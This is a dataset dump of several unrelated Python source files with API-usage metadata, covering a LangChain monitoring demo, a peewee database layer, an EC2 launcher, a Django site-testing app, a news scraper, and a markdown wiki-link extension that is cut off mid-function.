"line_number": 15,
"usage_type": "call"
},
{
"api_name": "aliyunsdkcore.client",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "flask.current_app.config",
"line_number": 16,
"usage_type": "attribute"
},
{
... |
1132507113 | import logging
import time
import random
from langchain.agents import initialize_agent, load_tools
from langchain.chat_models import ChatOpenAI
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# import and initialize graphsignal
# add GRAPSIGNAL_API_KEY to your environment variables
import graphsignal
graphsignal.configure(deployment='langchain-demo')
def solve(user_id, task):
graphsignal.set_context_tag('user', user_id)
llm = ChatOpenAI(temperature=0)
tools = load_tools(["llm-math"], llm=llm)
agent = initialize_agent(
tools, llm, agent="zero-shot-react-description", verbose=True
)
agent.run(task)
# simulate some requests
while True:
id = random.randint(0, 10)
num = random.randint(0, 100)
try:
solve(f'user{id}', f"What is {num} raised to .123243 power?")
logger.debug('Task solved')
except:
logger.error("Error while solving task", exc_info=True)
time.sleep(5 * random.random())
| graphsignal/examples | langchain-app/main.py | main.py | py | 1,010 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "graphsignal.con... |
23059482493 | import peewee
import main
import logging
db_filename = main.CONF.get('VK', 'db_file', fallback='')
db = peewee.SqliteDatabase(db_filename, pragmas={'journal_mode': 'wal',
'cache_size': 64,
'foreign_keys': 1,
'ignore_check_constraints': 0,
'synchronous': 0})
class User(peewee.Model):
id = peewee.IntegerField(primary_key=True)
name = peewee.CharField()
is_fem = peewee.BooleanField()
money = peewee.IntegerField(default=0)
class Meta:
database = db
class Admins(peewee.Model):
user = peewee.ForeignKeyField(User, primary_key=True, on_delete='cascade')
status = peewee.IntegerField(default=0)
class Meta:
database = db
class Group(peewee.Model):
id = peewee.IntegerField(primary_key=True)
name = peewee.CharField()
add_by = peewee.ForeignKeyField(User)
accepted = peewee.IntegerField(default=0)
nsfw = peewee.BooleanField(default=False)
likes = peewee.IntegerField(default=0)
views = peewee.IntegerField(default=0)
subs = peewee.IntegerField(default=0)
last_update = peewee.IntegerField(default=0)
last_post = peewee.IntegerField(default=0)
last_scan = peewee.IntegerField(default=0)
class Meta:
database = db
class Price(peewee.Model):
group = peewee.ForeignKeyField(Group, primary_key=True, on_delete='cascade')
add_by = peewee.ForeignKeyField(User)
accepted = peewee.IntegerField(default=0)
last_scan = peewee.IntegerField(default=0)
head = peewee.IntegerField(default=0)
half = peewee.IntegerField(default=0)
full = peewee.IntegerField(default=0)
class Meta:
database = db
class Art(peewee.Model):
id = peewee.IntegerField(primary_key=True)
vk_id = peewee.CharField(unique=True)
url = peewee.CharField(unique=True)
source = peewee.CharField()
add_by = peewee.ForeignKeyField(User)
from_group = peewee.ForeignKeyField(Group, on_delete='cascade')
accepted = peewee.IntegerField(default=0)
add_time = peewee.IntegerField(default=0)
message_id = peewee.IntegerField(default=0)
class Meta:
database = db
class Tag(peewee.Model):
id = peewee.IntegerField(primary_key=True)
title = peewee.CharField(default='None')
description = peewee.CharField(default='None')
class Meta:
database = db
class ArtTag(peewee.Model):
art = peewee.ForeignKeyField(Art, on_delete='cascade')
tag = peewee.ForeignKeyField(Tag, on_delete='cascade')
class Meta:
database = db
primary_key = peewee.CompositeKey('art', 'tag')
class Migrations(peewee.Model):
id = peewee.IntegerField(primary_key=True)
class Meta:
database = db
def init_db():
if not db.get_tables():
db.create_tables([User, Group, Admins, Migrations, Art, Tag, ArtTag, Price])
Migrations.create(id=1)
Migrations.create(id=2)
Migrations.create(id=3)
return True
return False
def update_admins(admin_list):
for admin in admin_list:
if admin['role'] in ['creator', 'administrator']:
user = User.get_or_none(id=admin['id'])
if user:
if not Admins.get_or_none(user=user):
Admins.create(user=user)
def update_db():
import playhouse.migrate as playhouse_migrate
db_migrate = peewee.SqliteDatabase(db_filename, pragmas={'journal_mode': 'wal',
'cache_size': 64,
'foreign_keys': 0,
'ignore_check_constraints': 0,
'synchronous': 0})
migrator = playhouse_migrate.SqliteMigrator(db_migrate)
if not Migrations.get_or_none(1):
logging.info(f'migration 1')
playhouse_migrate.migrate(
migrator.add_column('Group', 'accepted', peewee.BooleanField(default=False)),
)
Migrations.create(id=1)
if not Migrations.get_or_none(2):
logging.info(f'migration 2')
playhouse_migrate.migrate(
migrator.add_column('Group', 'last_scan', Group.last_scan),
migrator.add_column('Art', 'message_id', Art.message_id),
)
Migrations.create(id=2)
if not Migrations.get_or_none(3):
logging.info(f'migration 3')
db.create_tables([Price])
Migrations.create(id=3)
# playhouse_migrate.migrate(
# migrator.add_column('RpProfile', 'show_link', RpProfile.show_link),
# # migrator.rename_column('ProfileSettingList', 'item_id', 'item'),
# # migrator.drop_column('RoleOffer', 'to_profile_id')
# )
if __name__ == "__main__":
update_db()
pass
| Sithief/async_bot | database/db_api.py | db_api.py | py | 5,009 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "main.CONF.get",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "main.CONF",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "peewee.SqliteDatabase",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "peewee.Model",
"l... |
135256696 | from enum import Enum
import logging
import coloredlogs
import itertools
_LoggerEnums = {
1: ['system', 'SYSTEM'],
2: ['client', 'CLIENT'],
3: ['handler', 'HANDLER'],
}
LoggerEnums = Enum(
value='LoggerEnums',
names=itertools.chain.from_iterable(
itertools.product(v, [k]) for k, v in _LoggerEnums.items()
)
)
logging.getLogger("urllib3").propagate = False
def initLogging(config):
global logger
coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s [%(name)10s] [%(levelname).1s] %(message)s'
coloredlogs.DEFAULT_DATE_FORMAT = '%Y-%m-%d %H:%M:%S.%f'
coloredlogs.DEFAULT_FIELD_STYLES = {'asctime': {'color': 'cyan'}, 'name': {'bold': True, 'color': 'black'}, 'levelname': {'bold': True, 'color': 'black'}}
coloredlogs.install(level=config['log']['level'])
def getLogger(type: LoggerEnums):
logger = logging.getLogger(type.name)
return logger
| techolutions/madqtt-pi | madqtt/utils/Logging.py | Logging.py | py | 900 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "enum.Enum",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.chain.from_iterable",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "itertools.chain",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "itertool... |
17929496471 | #!/usr/bin/python3
import sys
import collections
class Tree:
children = None
metadata = None
def __init__(self):
self.children = collections.deque()
self.metadata = collections.deque()
def parse_input():
line = next(sys.stdin).strip()
i = 0
while i < len(line):
num = 0
while line[i] != ' ' and i < len(line):
num *= 10
num += int(line[i])
i += 1
i += 1
yield num
return
def build_tree(line = None, i = None):
if not line:
line = [int(x) for x in next(sys.stdin).split()]
i = 0
t = Tree()
nc = line[i + 0]
nm = line[i + 1]
if nc == 0:
for j in range(nm):
t.metadata.append(line[i + 2 + j])
return (t, i + 2 + nm)
ni = i + 2
for j in range(nc):
(st, ni) = build_tree(line, ni)
t.children.append(st)
for j in range(nm):
t.metadata.append(line[ni])
ni += 1
return (t, ni)
def checksum(tree):
ret = sum(tree.metadata)
for subtree in tree.children:
ret += checksum(subtree)
return ret
def value(tree):
if len(tree.children) == 0:
return sum(tree.metadata)
ret = 0
for entry in tree.metadata:
if entry == 0:
continue
idx = entry - 1
if idx < len(tree.children):
ret += value(tree.children[idx])
return ret
def main():
(t, _) = build_tree()
print(checksum(t))
print(value(t))
if __name__ == "__main__":
main()
| Easimer/advent-of-code-2018 | day8/day8.py | day8.py | py | 1,553 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin",
"l... |
4079006523 | """
Plot omega, sliding net charge
plot sliding fraction of Q/N, S/T, A/G, P
"""
import os
import pandas as pd
import matplotlib.pyplot as plt
from deconstruct_lc import tools_lc
from deconstruct_lc.complementarity import motif_seq
class Fraction(object):
def __init__(self):
self.k = 6
self.lca = 'SGEQAPDTNKR'
self.lce = 1.6
def process_seq(self, seq, k):
kmers = tools_lc.seq_to_kmers(seq, k)
qn = self.alph_fracs(kmers, 'QN')
st = self.alph_fracs(kmers, 'ST')
ag = self.alph_fracs(kmers, 'AG')
p = self.alph_fracs(kmers, 'P')
ed = self.alph_fracs(kmers, 'ED')
kr = self.alph_fracs(kmers, 'KR')
f = self.alph_fracs(kmers, 'F')
r = self.alph_fracs(kmers, 'R')
#plt.plot(qn, label='QN')
plt.plot(st, label='ST')
#plt.plot(ag, label='AG')
#plt.plot(r, label='R')
#plt.plot(f, label='F')
lca_x, lca_y, lce_x, lce_y = self.get_motif_index(seq)
plt.scatter(lca_x, lca_y, color='black', s=2)
plt.scatter(lce_x, lce_y, color='red', s=2)
#plt.plot(ed, label='ED')
#plt.plot(kr, label='KR')
plt.plot(p, label='P')
plt.legend()
plt.show()
def alph_fracs(self, kmers, alph):
fracs = []
for kmer in kmers:
frac = self.get_frac(kmer, alph)
fracs.append(frac)
return fracs
def get_frac(self, kmer, alph):
tot_count = 0
for aa in alph:
tot_count += kmer.count(aa)
assert tot_count <= len(kmer)
frac = float(tot_count)/float(len(kmer))
return frac
def get_motif_index(self, sequence):
mot = motif_seq.LcSeq(sequence, self.k, self.lca, 'lca')
ind_in, ind_out = mot._get_motif_indexes()
lca_x = list(ind_in)
lca_y = [1]*(len(lca_x))
mot = motif_seq.LcSeq(sequence, self.k, self.lce, 'lce')
ind_in, ind_out = mot._get_motif_indexes()
lce_x = list(ind_in)
lce_y = [1.1]*(len(lce_x))
return lca_x, lca_y, lce_x, lce_y
class Pipeline(object):
def __init__(self):
self.base_fp = os.path.join(os.path.dirname(__file__), '..', 'data')
self.nmo_fpi = os.path.join(self.base_fp, 'scores',
'nmo_6_SGEQAPDTNKR_6_1.6_seq_scores.tsv')
self.pdb_fpi = os.path.join(self.base_fp, 'scores',
'pdb_nomiss_cd50_6_SGEQAPDTNKR_6_1.6_seq_scores.tsv')
self.lca_label = '6_SGEQAPDTNKR'
self.lce_label = '6_1.6'
def sandbox(self):
label = self.lca_label
df = pd.read_csv(self.nmo_fpi, sep='\t', index_col=0)
df = df[(df[label] > 30)]
df = df.sort_values(by=[label])
df = df.reset_index(drop=True)
for i, row in df.iterrows():
sequence = row['Sequence']
print(len(sequence))
print(row[label])
print(row['Protein ID'])
frac = Fraction()
frac.process_seq(sequence, 6)
def main():
pipe = Pipeline()
pipe.sandbox()
if __name__ == '__main__':
main() | shellydeforte/deconstruct_lc | deconstruct_lc/complementarity/sliding_fraction.py | sliding_fraction.py | py | 3,162 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "deconstruct_lc.tools_lc.seq_to_kmers",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "deconstruct_lc.tools_lc",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 30,
"usage_type": "call"
},
{
... |
32105984708 | from datetime import datetime
from string import Template
import pandas as pd
def read_template(file: str) -> Template:
with open(file, "r") as f:
content = f.read()
return Template(content)
df = pd.read_csv("export.csv")
df = df.astype(
{
"repository_stars_count": "Int64",
}
)
df = df.fillna(
{
"repository_domain": "",
"description": "",
"repository_last_update": "",
"distribution": "",
}
)
header = (
"<thead>\n"
"<tr>\n"
"<th>Name</th>\n"
"<th>Repository</th>\n"
"<th>Repository Stars Count</th>\n"
"<th>Repository Last Update</th>\n"
"<th>Repository Domain</th>\n"
"<th>Categories</th>\n"
"<th>Compatibility</th>\n"
"<th>Frameworks</th>\n"
"<th>Distribution</th>\n"
"<th>Description</th>\n"
"</tr>\n"
"</thead>\n"
)
table_data = "<tbody>\n"
for index, row in df.iterrows():
name = f"<a href='{row['url']}'>{row['name']}</a></td>"
table_data += (
"<tr>\n"
"<td>"
f"{name}"
"\n"
f"<td><a href='{row['repository']}'>{row['repository']}</a></td>"
"\n"
f"<td>{row['repository_stars_count']}</td>"
"\n"
f"<td>{row['repository_last_update']}</td>"
"\n"
f"<td>{row['repository_domain']}</td>"
"\n"
f"<td>{row['categories']}</td>"
"\n"
f"<td>{row['compatibility']}</td>"
"\n"
f"<td>{row['frameworks']}</td>"
"\n"
f"<td>{row['distribution']}</td>"
"\n"
f"<td>{row['description']}</td>"
"\n"
"</tr>\n"
)
table_data += "</tbody>\n"
date_update = datetime.today().strftime("%Y-%m-%d")
formatted_message = read_template("template.html").safe_substitute(
{"date_update": date_update, "header": header, "table_data": table_data}
)
with open("docs/index.html", "w") as f:
f.write(formatted_message)
| dbeley/lpa-table | lpa_html_builder.py | lpa_html_builder.py | py | 1,930 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "string.Template",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "string.Template",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.toda... |
36408701647 | from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from django.views import generic
from .forms import PilotForm
from .models import Site, Pilot, Comment
from . import creed
from . import webster
import datetime
import traceback
class IndexView(generic.ListView):
template_name = 'assure/index.html'
context_object_name = 'latest_site_list'
fields = ['url']
form_class = PilotForm
model = Site
def __init__(self):
self.webster = webster.Webster()
self.creed = creed.Main(self.webster)
def get_queryset(self):
"""Return the last five published sites."""
return Site.objects.order_by('-pub_date')[:5]
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['latest_site_list'] = Site.objects.all()
context.update({'form':self.form_class})
return context
def post(self, request):
if request.method == 'POST':
site=''
pilot=''
url=''
form = PilotForm(request.POST)
if form.is_valid():
url,url_test = self.validate_url(request.POST.get('url'))
try: #fails = site is new and requires a report
site = Site.objects.get(url__contains=url)
except Site.DoesNotExist:
site = Site(url=url,pub_date=datetime.datetime.now(),domain=url.split('.')[1])
site.save()
finally:
try:
pilot = Pilot.objects.get(site=site)
dictionary = self.creed.test_units(url=site.url)
pilot.pub_date=datetime.datetime.now()
pilot.viewport_json=dictionary['viewport']
pilot.site_json=dictionary['site']
pilot.homepage_json=dictionary['homepage']
pilot.save()
except Pilot.DoesNotExist:
try:
dictionary = self.creed.test_units(url=url)
pilot = Pilot(site=site,current_rating=9,pub_date=datetime.datetime.now(),viewport_json=dictionary['viewport'],site_json=dictionary['site'])
pilot.save()
except Exception as e:
traceback.print_exc()
self.creed.quit_driver()
Site.objects.get(url__contains=url).delete()
return HttpResponseRedirect(reverse('assure:detail', args=(site.id,)))
#return self.render_to_response(self.get_context_data(context_object_name=self.context_object_name, form=form))
def validate_url(self, url):
import re
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE
)
return url,re.match(regex, url) is not None
class DetailView(generic.DetailView):
model = Site
template_name = 'assure/detail.html'
context_object_name = 'latest_report'
fields = ['url']
form_class = PilotForm
def __init__(self):
self.webster = webster.Webster()
self.creed = creed.Main(self.webster)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
site=Site.objects.get(url__contains=kwargs['object'])
try:
pilot = Pilot.objects.get(site=site)
except Pilot.DoesNotExist:
pilot=None
context['latest_report'] = pilot
context.update({'form':self.form_class})
return context
def post(self, request, pk):
if request.method == 'POST':
dictionary={}
site=''
pilot=''
form = PilotForm(request.POST)
try:
site=Site.objects.get(pk=pk)
pilot = Pilot.objects.get(site=site)
except Pilot.DoesNotExist:
pilot = Pilot(site=site)
finally:
try:
pilot = Pilot.objects.get(site=site)
dictionary = self.creed.test_units(url=site.url)
pilot.pub_date=datetime.datetime.now()
pilot.viewport_json=dictionary['viewport']
pilot.site_json=dictionary['site']
pilot.homepage_json=dictionary['homepage']
pilot.save()
except Pilot.DoesNotExist:
try:
dictionary = self.creed.test_units(url=site.url)
pilot = Pilot(site=site,
current_rating=9,
pub_date=datetime.datetime.now(),
viewport_json=dictionary['viewport'],
site_json=dictionary['site']
)
pilot.save()
except Exception as e:
traceback.print_exc()
self.creed.quit_driver()
Site.objects.get(url__contains=url).delete()
return HttpResponseRedirect(reverse('assure:detail', args=(site.id,)))
'''def detail(request, site_id):
pilot = get_object_or_404(Pilot, pk=site_id)
return render(request, 'assure/detail.html', {'pilot':pilot})'''
class ResultsView(generic.DetailView):
model = Site
template_name = 'assure/results.html'
def comment(request, site_id):
site = get_object_or_404(Site, pk=site_id)
try:
selected_choice = site.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the site voting form.
return render(request, 'assure/detail.html', {
'site': site,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('assure:results', args=(site.id,)))
| chadwickcheney/SeleniumTests | assure/views.py | views.py | py | 6,511 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.views.generic.ListView",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "django.views.generic",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "forms.PilotForm",
"line_number": 16,
"usage_type": "name"
},
{
"api_name"... |
36244286092 | #!/usr/bin/env python
import boto3
import subprocess
#output = subprocess.call(['/home/ansadmin/nagaratest/docker.sh'])
import time
ec2 = boto3.resource('ec2')
import yaml
config = yaml.load(open('config.yml'))
ec2 = boto3.resource('ec2')
instance = ec2.create_instances(
ImageId = config['ImageId'],
MinCount = config['MinCount'],
MaxCount = config['MaxCount'],
InstanceType = config['InstanceType'],
KeyName = config['KeyName'],
SubnetId = config['SubnetId'],
UserData = '#!/bin/bash'+'\n'+'sudo su'+'\n'+'yum update -y'+'\n'+'yum install docker -y'+'\n'+'yum install git -y'+'\n'+'git clone https://github.com/asquarezone/DockerZone.git /home/ec2-user/tomcat_test'+'\n'+'sleep 15'+'\n'+'service docker start'+'\n'+'docker build -t tomcat_test /home/ec2-user/tomcat_test/ImageCreation/DockerFiles/tomcat_demo'+'\n'+'docker run -itd -p 8080:8080 tomcat_test')
print (instance[0].id)
instance = instance[0]
# Wait for the instance to enter the running state
instance.wait_until_running()
# Reload the instance attributes
instance.load()
print (instance.public_ip_address)
print ( "url is: " + instance.public_dns_name + ":8080" )
| hotkey123/test | nagaratest/final_create_instance.py | final_create_instance.py | py | 1,161 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.resource",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "yaml.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "boto3.resource",
"line_number": 10,
"usage_type": "call"
}
] |
29976613151 | import os.path as osp
import mmcv
import numpy as np
import pycocotools.mask as maskUtils
from pycocotools.coco import COCO
from .coco import CocoDataset
from .registry import DATASETS
@DATASETS.register_module
class SideWalkDataset(CocoDataset):
CLASSES = ('barricade', 'bench', 'bicycle', 'bollard', 'bus', 'car',
'carrier', 'cat', 'chair', 'dog', 'fire_hydrant', 'kiosk',
'motorcycle', 'movable_signage', 'parking_meter', 'person',
'pole', 'potted_plant', 'power_controller', 'scooter', 'stop',
'stroller', 'table', 'traffic_light',
'traffic_light_controller', 'traffic_sign', 'tree_trunk',
'truck', 'wheelchair')
def load_annotations(self, ann_file):
self.coco = COCO(ann_file)
self.cat_ids = self.coco.getCatIds()
self.cat2label = {
cat_id: i + 1
for i, cat_id in enumerate(self.cat_ids)
}
self.img_ids = self.coco.getImgIds()
img_infos = []
for i in self.img_ids:
info = self.coco.loadImgs([i])[0]
info['filename'] = osp.join(info['img_prefix'], info['file_name'])
img_infos.append(info)
return img_infos
def show_annotations(self, img_id, show=False, out_file=None, **kwargs):
img_info = self.img_infos[img_id]
img_path = osp.join(self.img_prefix, img_info['filename'])
img = mmcv.imread(img_path)
annotations = self.coco.loadAnns(self.coco.getAnnIds(imgIds=[img_id]))
bboxes = []
labels = []
class_names = ['bg'] + list(self.CLASSES)
for ann in annotations:
if len(ann['segmentation']) > 0:
rle = maskUtils.frPyObjects(ann['segmentation'],
img_info['height'],
img_info['width'])
ann_mask = np.sum(
maskUtils.decode(rle), axis=2).astype(np.bool)
color_mask = np.random.randint(0, 256, (1, 3), dtype=np.uint8)
img[ann_mask] = img[ann_mask] * 0.5 + color_mask * 0.5
bbox = ann['bbox']
x, y, w, h = bbox
bboxes.append([x, y, x + w, y + h])
labels.append(ann['category_id'])
bboxes = np.stack(bboxes)
labels = np.stack(labels)
mmcv.imshow_det_bboxes(
img,
bboxes,
labels,
class_names=class_names,
show=show,
out_file=out_file,
**kwargs)
if not (show or out_file):
return img
| ytaek-oh/mmdetection | mmdet/datasets/sidewalk.py | sidewalk.py | py | 2,636 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "coco.CocoDataset",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "pycocotools.coco.COCO",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.path",
"li... |
8680864840 | """The module contains test functions to test Tankerkoenig API wrapper."""
import tempfile
import os
from unittest import TestCase
from unittest.mock import MagicMock, patch
from homemonitoring.tankerkoenig import TankerKoenig
class TestTankerKoenig(TestCase):
"""TestTankerKoenig contains the test cases for the TankerKoenig class."""
RESPONSE_DETAIL_FIXTURES = {
"id_1": {
"station": {"id": "id_1"}
}
}
@patch("requests.get")
def test_call_api(self, mock):
"""Checks function that composes API call."""
apikey = 'apikey'
ids = "1,2,3"
api = TankerKoenig(apikey)
api._call_api('details.php', ids=ids)
mock.assert_called_with(
'https://creativecommons.tankerkoenig.de/json/details.php',
params={'ids': ids, 'apikey': apikey}
)
def test_get_station_details(self):
"""Checks get station details."""
station_id = 'id_1'
with tempfile.TemporaryDirectory() as tmp_dir:
api = TankerKoenig('api-key', cache_dir=tmp_dir)
def mock_call_api(endpoint, **params):
return self.RESPONSE_DETAIL_FIXTURES[params['id']]
api._call_api = MagicMock(side_effect=mock_call_api)
# call "API"
got = api.get_station_details(station_id, force_update=True)
expected = {'station': {'id': 'id_1'}}
self.assertDictEqual(got, expected)
assert os.path.exists(os.path.join(tmp_dir, f'{station_id}.json'))
api._call_api.assert_called_once()
# this time from file
got = api.get_station_details(station_id, force_update=False)
self.assertDictEqual(got, expected)
api._call_api.assert_called_once() # API should not have been called again
# this time force update
got = api.get_station_details(station_id, force_update=True)
self.assertDictEqual(got, expected)
assert api._call_api.call_count == 2 # API should not have been called again
| BigCrunsh/home-monitoring | homemonitoring/tests/tankerkoenig_test.py | tankerkoenig_test.py | py | 2,091 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "homemonitoring.tankerkoenig.TankerKoenig",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "unittest.mock.patch",
"line_number": 21,
"usage_type": "call"
},
{
"ap... |
34928053014 | import requests
from bs4 import BeautifulSoup
import pandas as pd
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
import re
with open('raw_kaggle_huffpost.json', 'r') as file:
entries = file.read().lower().split("\n")
def create_cookies():
chrome_options = Options()
chrome_options.add_argument("--headless")
driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options)
driver.get('https://www.huffpost.com/entry/immigrant-children-separated-from-parents_n_5b087b90e4b0802d69cb4070')
driver.find_element_by_xpath('/html/body/div[1]/div[2]/div[4]/div/div[2]/form[1]/div/input').click()
cookies_list = driver.get_cookies()
cookies_dict = {}
for cookie in cookies_list:
cookies_dict[cookie['name']] = cookie['value']
return cookies_dict
def parse_response(response, new):
soup = BeautifulSoup(response.text, 'html.parser')
title = soup.find(attrs={"class": "headline__title"})
if title is not None:
title = title.getText()
else:
title = soup.find(attrs={"class": "headline"}).getText()
subtitle = soup.find(attrs={"class": "headline__subtitle"})
if subtitle is not None:
subtitle = subtitle.getText()
else:
subtitle = soup.find(attrs={"class": "dek"})
if subtitle is not None:
subtitle = subtitle.getText()
date = soup.find(attrs={"class": "timestamp"})
if date is not None:
date = date.getText().split()[0]
text = ""
paragraphs = soup.find_all(attrs={"class": "content-list-component yr-content-list-text text"})
if len(paragraphs) == 0:
paragraphs = soup.find_all(attrs={"class": "cli cli-text"})
for paragraph in paragraphs:
text += paragraph.getText()
text += '\n'
return {
'title': title,
'subtitle': subtitle,
'category': new['category'],
'text': text,
'date': date,
'url': url
}
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
cookies = create_cookies()
headers = {
'Referer': 'https://www.huffpost.com/entry/immigrant-children-separated-from-parents_n_5b087b90e4b0802d69cb4070',
'Sec-Fetch-Mode': 'no-cors',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
}
cached = pd.read_csv('datasets/cached_news.csv')
network = pd.read_csv('datasets/network_news.csv')
df = pd.concat([cached, network]).drop_duplicates().reset_index(drop=True)
df.to_csv('datasets/cached_news.csv', index=False)
network.iloc[0:0].to_csv('datasets/network_news.csv', index=False)
data_source = []
news = []
for entry in entries:
new = eval(entry)
if new['category'] in ['politics', 'entertainment', 'queer voices',
'business', 'comedy', 'sports', 'black voices',
'the worldpost', 'women', 'impact', 'crime', 'media',
'weird news', 'green', 'religion', 'science', 'world news',
'tech', 'arts & culture', 'latino voices', 'education']:
news.append(new)
index_from_network = 0
for i, new in enumerate(news):
if i % 50 == 0:
print(i, index_from_network, len(news))
url = new['link']
row = df[df.url == url]
if not row.empty:
continue
try:
index_from_network = index_from_network + 1
if re.match(regex, url) is None:
print('invalid url:', url)
continue
response = requests.get(url, headers=headers, cookies=cookies)
new = parse_response(response, new)
data_source.append(new)
if index_from_network % 100 == 0:
print('saving dataset', index_from_network)
pd.DataFrame(data_source).to_csv('datasets/network_news.csv', index=False)
except:
print('error when trying to process', url)
| the-super-toys/ml-there-will-be-news | fetch-dataset.py | fetch-dataset.py | py | 4,295 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 16,
"usage_type": "name"
},
{... |
14114648700 | import sys
from collections import deque
def bfs(node):
queue = deque()
queue.append(node)
visited[node] = True
while len(queue) != 0:
cur_node = queue.popleft()
for linked_node in adj[cur_node]:
if not visited[linked_node]:
visited[linked_node] = True
queue.append(linked_node)
if __name__ == "__main__":
N, M = map(int, sys.stdin.readline().split())
adj = [[] for _ in range(N + 1)]
visited = [False] * (N + 1)
for _ in range(M):
srt, end = map(int, sys.stdin.readline().split())
adj[srt].append(end)
adj[end].append(srt)
cnt = 0
for node in range(1, N + 1):
if not visited[node]:
bfs(node)
cnt += 1
print(cnt) | nashs789/JGAlgo | Week02/Q11724/Q11724_Inbok.py | Q11724_Inbok.py | py | 786 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline... |
25460261702 | import logging
from markdown.extensions import Extension
from markdown.inlinepatterns import Pattern
from markdown.util import etree
logger = logging.getLogger(__name__)
def build_url(label, base, end):
""" Build a url from the label, a base, and an end. """
return '%s%s%s' % (base, label, end)
def build_label(label):
return label.split('/')[-1]
def url_exists(url):
print("ORIGINAL URL")
return True
class WikiLinkExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {
'base_url': ['/', 'String to append to beginning or URL.'],
'end_url': ['/', 'String to append to end of URL.'],
'html_class': ['wikilink', 'CSS hook. Leave blank for none.'],
'build_url': [build_url, 'Callable that formats URL from label.'],
'build_label': [build_label, 'Callable that formats the label.'],
'url_exists': [url_exists,
'Callable that returns wether a URL exists']
}
super(WikiLinkExtension, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
# append to end of inline patterns
WIKILINK_RE = r'\[\[([A-Za-z0-9_ -/]+)\]\]'
wikilinkPattern = MDWikiLinks(WIKILINK_RE, self.getConfigs())
wikilinkPattern.md = md
md.inlinePatterns.add('mdwikilink', wikilinkPattern, "<not_strong")
class MDWikiLinks(Pattern):
def __init__(self, pattern, config):
super().__init__(pattern)
self.config = config
def handleMatch(self, m):
if m.group(2).strip():
a = etree.Element('a')
